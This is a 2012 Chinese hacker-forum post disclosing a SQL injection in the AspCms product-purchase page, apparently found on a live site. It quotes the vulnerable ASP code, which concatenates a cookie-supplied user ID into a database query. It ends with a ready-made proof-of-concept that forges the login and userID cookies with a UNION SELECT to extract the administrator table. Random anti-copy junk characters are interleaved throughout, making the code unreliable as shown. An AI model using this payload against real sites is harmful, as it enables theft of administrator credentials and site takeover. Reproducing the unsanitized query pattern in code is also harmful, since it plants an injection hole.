好久没上土司了,上来一看发现在删号名单内.....
" r% y* z& ]6 ?也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
( I( j1 q8 q) k3 B7 \; i5 b废话不多说,看代码:
: `; k; j* h) f$ l. a' c* H" O) R
/ ?' e K' M! s. ?8 `- t+ o<%1 G$ g0 B6 Q7 `- [4 e" E$ E
H2 g7 O1 T2 [: c: |if action = "buy" then
/ b) ]; s( [4 }2 H' B0 [
6 g/ s5 J4 U& l1 Q addOrder()
% y9 H, N6 {# P. M4 z$ v$ \/ T3 W' w/ _/ V2 u9 D
else
# \+ k6 ?2 k! b* g5 w c
( u: P) @& N) g4 b echoContent()% K2 k1 k/ T! L& }+ _4 k k& h
v' H3 O- N6 C* Q) `9 ~8 [' send if7 ?& ^9 e9 [; }* k6 p0 A
w0 {0 ^6 F7 w* l; T$ ], k
. r3 W6 h8 N6 f1 d
- u) `1 F K9 {/ ?6 c……略过
/ w& l) T" u' y6 O" k6 K" v1 v$ }0 X+ S3 L! b/ W
$ Z! z+ s! |3 w [# H$ D
/ R/ y4 Q* {; o2 p
Sub echoContent()% L' V1 p% m7 v" b- P" I! T
* o' y* u% ^. ?2 H7 y) F# Q dim id% [; w$ |$ d6 \. t4 w- L
- w. [5 P9 S, K/ L" ]( m1 ^
id=getForm("id","get")
0 A% a; `$ A V
( E% l. G+ L( N" O5 | 0 W7 x C* P& r0 ~+ l
; d1 ]5 O% A% h) o2 y
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" / N0 o @. j7 [- w: w/ p
5 X! ?( N3 M) U0 r; F" U7 d
- t/ h( l& O( W
7 q+ R& T) r, v* ^8 \9 f4 K6 V dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
& p9 k3 o9 r) Z4 i0 }
5 O$ n; I$ Q: Z: r( g5 T1 v, y dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct' n: Q' [ T* t! T6 o8 y( h
8 e. r3 r% Z0 l4 w; d
Dim templatePath,tempStr" f" `* T: u5 c6 v; N, z
3 m1 O7 f/ j/ N8 u) O5 H& ^9 h
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
* Y4 U. @' i$ H1 @, ]7 j0 j1 Q' L) Z2 D- }5 y
2 Z4 E5 d! `/ X# o& Y1 b
: p' `1 Z) Z, z) i6 k! G set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")! Z5 l. u" W- Z
7 N. O7 W/ S* v+ m( y. j: b' y- ]1 G* Y
selectproduct=rsObj(0)
$ a: l, ?( Q. G ~' P/ S9 D* k% }3 m6 t5 q5 O# @8 ]
+ S) f$ X1 v: d& R& m I
. v6 \9 Z+ L8 ?4 x( l! f' H
Dim linkman,gender,phone,mobile,email,qq,address,postcode6 m. s9 `1 t5 d+ e! U8 R" M! Q
2 W1 A9 h1 G* e: w$ b1 p" E
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
e( Z: |3 ?9 ~# q! j, x$ l# b. o$ M5 k! k+ ]. o0 R& _' E
if rCookie("loginstatus")=1 then
+ {6 ]8 s* L+ q" S1 _- C% \' V: B0 S: D% B3 G$ x2 E$ J+ x
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
& ^; i7 v8 U9 r5 Y- c3 X' J: ?/ f* G' r, K; V1 _2 S" g" |' J# m7 B
linkman=rsObj("truename")
0 Y" k) t, j$ f; G4 c% s5 i J# ?7 ], P& r8 N
gender=rsObj("gender"): N1 y( Q' r# G2 |5 o
# g* \/ n8 q3 h: n4 }1 c9 ?
phone=rsObj("phone")1 I! _. d1 U0 S/ O
7 W+ V$ J8 U1 L0 K) L" w/ \- a
mobile=rsObj("mobile")
7 Y3 q" w$ P& D3 J$ r
" D$ S+ I2 v; h/ F email=rsObj("email")
& V( Z, j4 }" J8 [/ ^: j( K( B
) f8 B' K3 b& a& X5 w+ w# X2 ^( S qq=rsObj("qq")* ?% x! ]2 N' C2 w
. Y2 x7 ?0 l. m# _% t. Z$ P* z" i: M' D
address=rsObj("address")
3 H- g2 d; V$ c) l$ {! A% o0 x* n2 E9 H
postcode=rsObj("postcode")
8 Z0 [$ ], W7 Y4 }4 y
8 y% H6 ?2 I$ H5 f, N5 i/ [( P0 X) u else
" C0 V; u9 |; W" v- b
( _! N; B x7 c$ M5 z& \5 V gender=1" m, j: J2 m6 _& c3 j
. P1 s( s+ @4 \7 A7 @; c end if
% |- D9 V; n: ^8 O8 Q. r/ i' t8 w2 I. n- f- E# g2 x1 ^! W# h' j
rsObj.close()0 D' {! W) W9 q5 I# f
% x l$ Y2 y# `& G
/ f( G/ _$ U! T% y. }, z
. i9 h9 n: U5 _) t& _
with templateObj
* s( R3 q' g3 J1 z! _! l/ [, p& }6 S/ t% x
.content=loadFile(templatePath) , Q1 `0 ? I" R% R" Y+ i
( s! e5 c6 V: Y/ W/ _8 c .parseHtml()
1 q G# J* d" S$ P3 }% _ K, n' `7 D
7 V4 @% T F9 u1 _4 u .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct): G- V0 Z3 ?# D) ~; c9 P; {
& V+ K( U) W7 K- J .content=replaceStr(.content,"[aspcms:linkman]",linkman) / ]+ K* U. }+ r9 n
& _. S8 q- u/ g6 t! q: { .content=replaceStr(.content,"[aspcms:gender]",gender) - O/ B$ G' d" }" o$ {6 K
$ u) q) O1 k8 D
.content=replaceStr(.content,"[aspcms:phone]",phone)
: L9 ^. Q1 e5 d4 K, r
0 i6 ~3 M: ~* f0 C* s1 p .content=replaceStr(.content,"[aspcms:mobile]",mobile) 3 B" _! N! P+ U3 m
+ X. W. I: f) m; z; Y
.content=replaceStr(.content,"[aspcms:email]",email)
* C1 H- c, d% W, [: h( }
/ G" v) q" Y6 l: @& ~& T .content=replaceStr(.content,"[aspcms:qq]",qq)
' G2 K% A7 `& d, X3 c" P8 ^! A# s3 ^+ l& P; o
.content=replaceStr(.content,"[aspcms:address]",address)
6 e; m, j) Q5 b1 `# u5 S% V3 u: E) d# \. J
.content=replaceStr(.content,"[aspcms:postcode]",postcode) y. q& t; V W' t+ {- R6 t. t- N
' V4 l, f* K$ {; U .parseCommon()
) ]$ ]% c+ o6 [+ W V( V, b% E3 Z
echo .content * ?: O7 s' t+ e8 b5 V' X3 p
: \8 C8 e% }8 O% S5 X+ D end with
( O$ O; m& ]7 w2 c5 r' Q& b. f! e
set templateobj =nothing : terminateAllObjects( k' w: E6 e! m( ~: X+ b" G
7 ]8 D2 O! S" I" k# f/ ]6 y: nEnd Sub
5 F7 u: H1 }# x# X. B! U( ]漏洞很明显,没啥好说的8 k" h6 X, G V1 H* l( J
poc:. F, X/ u2 d3 Z. V
: M z" E( @8 C* R! hjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
3 Y! \1 H& I! t- f" _" o
6 V; l8 v5 V2 g* I7 T) b |
发表于 2012-12-27 08:35:05
收藏
支持
反对